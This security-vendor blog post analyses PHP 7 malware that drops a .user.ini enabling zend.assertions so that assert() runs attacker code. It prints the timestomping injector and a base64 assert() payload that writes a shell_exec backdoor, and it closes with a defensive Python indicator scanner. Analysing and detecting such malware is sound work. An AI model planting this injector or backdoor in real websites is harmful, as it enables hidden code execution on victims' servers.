Labs Note

Using assert() to Execute Malware in PHP 7 Environments

September 1, 2020 | Krasimir Konov


Initially released December 2015, PHP 7 introduced a multitude of performance and security improvements. Approximately 43.7% of websites across the web currently use PHP 7.x, making it an incredibly popular scripting language — which is likely why attackers are creating malware to target environments which leverage it.

During a recent investigation, our team stumbled across malicious code that drops a .user.ini file into a PHP 7 environment and adds zend.assertions = 1 to it. Once that directive is in place, bad actors can leverage PHP's assert() function to execute any code they like.

<?php
function __lambda_func()
{
    // Only act on PHP 7; assert() evaluates its argument there when assertions are enabled.
    if (defined('PHP_MAJOR_VERSION') && PHP_MAJOR_VERSION == '7') {
        // Append the directive unless a .user.ini already enables assertions.
        if (!file_exists('.user.ini') || strpos(file_get_contents('.user.ini'), 'zend.assertions = 1') === false) {
            $mtime = @filemtime('./');
            @file_put_contents(".user.ini", "zend.assertions = 1;\n", FILE_APPEND);
            // Reset the directory's and the new file's mtime to the old value so the
            // change does not stand out in a listing sorted by modification time.
            @touch('./', $mtime, $mtime);
            @touch(".user.ini", $mtime, $mtime);
        }
    }
    // Make assertions active, abort on failure, and suppress warnings that might surface in logs.
    assert_options(ASSERT_ACTIVE, true);
    assert_options(ASSERT_BAIL, true);
    assert_options(ASSERT_WARNING, false);
}

This code sample is designed to deploy malicious code while concealing it from detection, and it can be used to bypass restrictions set in the php.ini file. By creating a .user.ini file and setting zend.assertions to 1, attackers override the server's php.ini value for that directory and can then leverage assert() to execute malware.

In a development environment where zend.assertions=1, the expression passed to assert() is executed. If the value is 0, the assertion code is compiled but skipped at runtime, and in production environments where zend.assertions=-1 it is not even compiled, so it costs nothing at runtime. That is exactly why the malware needs the .user.ini drop: without it, the assert() payload on a production server would never run.

Here is one example of assert() being used to execute code to create a malicious backdoor. Note that zend.assertions has been set to 1:

$ grep "^zend.assertions" /etc/php/7.4/cli/php.ini
zend.assertions = 1

$ ls -la
total 8
drwxrwxr-x  2 core core 4096 May 01 10:08 .
drwxrwxr-x 10 core core 4096 May 01 10:00 ..

$ php -r 'assert(base64_decode("ZmlsZV9wdXRfY29udGVudHMoJ2luamVjdGVkLnBocCcsICc8P3BocCBlY2hvICJhbm90aGVyIGJhY2tkb29yXG4iOyBlY2hvIHNoZWxsX2V4ZWMoInVuYW1lIC1hIik7IGVjaG8gIlxuIjsnKTs="));'

$ ls -la
total 12
drwxrwxr-x  2 core core 4096 May 01 10:09 .
drwxrwxr-x 10 core core 4096 May 01 10:00 ..
-rw-rw-r--  1 core core   72 May 01 10:09 injected.php

$ cat injected.php
<?php echo "another backdoor\n"; echo shell_exec("uname -a"); echo "\n";

$ php injected.php
another backdoor
Linux core 4.4.0-150-generic #176-Ubuntu SMP Wed May 29 18:56:26 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Because assert() evaluates whatever expression it is given, even innocuous-looking calls run with side effects whenever assertions are active:

  assert(print("Some debug message\n"));
  assert(($val = "dev") || true);

On the other hand, here is what happens when the value is set to its default directive -1:

$ grep "^zend.assertions" /etc/php/7.4/cli/php.ini
zend.assertions = -1

$ ls -la
total 8
drwxrwxr-x  2 core core 4096 May 01 10:11 .
drwxrwxr-x 10 core core 4096 May 01 10:00 ..

$ php -r 'assert(base64_decode("ZmlsZV9wdXRfY29udGVudHMoJ2luamVjdGVkLnBocCcsICc8P3BocCBlY2hvICJhbm90aGVyIGJhY2tkb29yXG4iOyBlY2hvIHNoZWxsX2V4ZWMoInVuYW1lIC1hIik7IGVjaG8gIlxuIjsnKTs="));'

$ ls -la
total 8
drwxrwxr-x  2 core core 4096 May 01 10:11 .
drwxrwxr-x 10 core core 4096 May 01 10:00 ..

$

When finding this type of malware within a compromised environment, it’s very likely that other malicious code will have also been added to different files around the website.

Attackers use the assert() function to avoid detection by modern web scanners, which typically look for more common PHP functions like eval. In some cases the eval function may even be disabled on the hosting environment (for example by the Suhosin module) to prevent code from being executed, and using assert() can bypass this type of restriction.
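The mechanics above give a defender four concrete things to look for: a .user.ini that enables zend.assertions, PHP source that names .user.ini at all (the injector has to write it from somewhere), a decoder's output fed straight into assert() (the page's php -r sample is that shape), and the timestomping done by touch(): it rewrites mtime but cannot rewrite ctime, so a file whose ctime is far newer than its mtime was touched after it was written. The script below, an added example that is not Sucuri's code, implements those checks over a document root, plus a small audit of a php.ini for the two settings that close the hole (zend.assertions = -1 and an empty user_ini.filename, which disables .user.ini processing in CGI/FPM SAPIs). It also relies on the fact that assert() evaluating a string as PHP code was deprecated in PHP 7.2 and removed in PHP 8.0, so this particular loader shape is a PHP 5/7 problem. Every file name and file body in build_demo_root() is constructed for the demonstration.

```python
"""Indicator scan for the assert()/.user.ini technique described above.
This is an added, defender-side example, not Sucuri's code. All paths and
file contents in build_demo_root() are constructed for the demonstration."""
import os
import re
import tempfile
import time

# "zend.assertions = 1" in any spacing, optionally quoted, optional ";..." tail.
ASSERT_INI_RE = re.compile(r'^\s*zend\.assertions\s*=\s*"?1"?\s*(?:;.*)?$', re.M)
# A decoder's output fed straight into assert(), as in the page's php -r sample.
ASSERT_DECODE_RE = re.compile(
    r'\bassert\s*\(\s*(?:@\s*)?(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(',
    re.I)
# PHP source that names .user.ini at all (legitimate application code rarely does).
USER_INI_REF_RE = re.compile(r'[\'"](?:\./)?\.user\.ini[\'"]')
PHP_EXTENSIONS = ('.php', '.phtml', '.inc')


def ini_enables_assertions(text):
    """True if an .ini body switches zend.assertions on."""
    return ASSERT_INI_RE.search(text) is not None


def php_ini_hardened(text):
    """True if a php.ini keeps assertions compiled out (-1) AND disables
    per-directory .user.ini files (user_ini.filename set to empty)."""
    assertions_off = re.search(r'^\s*zend\.assertions\s*=\s*-1\s*$', text, re.M)
    user_ini_off = re.search(r'^\s*user_ini\.filename\s*=\s*(?:""|\'\')?\s*$', text, re.M)
    return bool(assertions_off and user_ini_off)


def looks_timestomped(path, slack=3600):
    """touch() can rewrite mtime but not ctime; a ctime far newer than mtime
    means the timestamp was reset after the file was written."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > slack


def scan_webroot(root, slack=3600):
    """Walk a document root and return sorted (indicator, relative_path) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            if name == '.user.ini':
                with open(path, errors='replace') as fh:
                    if ini_enables_assertions(fh.read()):
                        findings.append(('user_ini_enables_assert', rel))
            elif name.lower().endswith(PHP_EXTENSIONS):
                with open(path, errors='replace') as fh:
                    body = fh.read()
                if ASSERT_DECODE_RE.search(body):
                    findings.append(('assert_payload', rel))
                if USER_INI_REF_RE.search(body):
                    findings.append(('user_ini_reference', rel))
            if looks_timestomped(path, slack):
                findings.append(('timestomp', rel))
    return sorted(findings)


def _write(root, rel, content):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w') as fh:
        fh.write(content)
    return path


def build_demo_root():
    """Constructed sample tree: an injector, the .user.ini it drops (with mtime
    rolled back the way the malware's touch() does), a loader, and a clean file."""
    root = tempfile.mkdtemp(prefix='webroot-')
    ninety_days_ago = time.time() - 90 * 86400
    _write(root, 'wp-content/cache/stats.php',
           '<?php @file_put_contents(".user.ini", "zend.assertions = 1;\\n", FILE_APPEND);\n')
    dropped = _write(root, 'wp-content/cache/.user.ini', 'zend.assertions = 1;\n')
    os.utime(dropped, (ninety_days_ago, ninety_days_ago))  # timestomp: mtime back, ctime stays now
    _write(root, 'wp-includes/class-smtp.php',
           '<?php assert(base64_decode("ZWNobyAxOw=="));\n')  # constructed loader; payload is "echo 1;"
    _write(root, 'index.php', '<?php echo "hello";\n')
    return root


if __name__ == '__main__':
    for indicator, rel in scan_webroot(build_demo_root()):
        print(f'{indicator:24} {rel}')
```

Treat the timestomp indicator as a lead rather than proof: deployments that preserve modification times (tar with -p, rsync -t, restores from backup) produce the same ctime/mtime gap. The other three indicators are much lower-noise, and a `.user.ini` that enables assertions inside a document root you did not configure that way is worth an incident ticket on its own.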


Categories: Sucuri Labs, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Hacked Websites, Labs Note, Obfuscation, Website Backdoor

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.
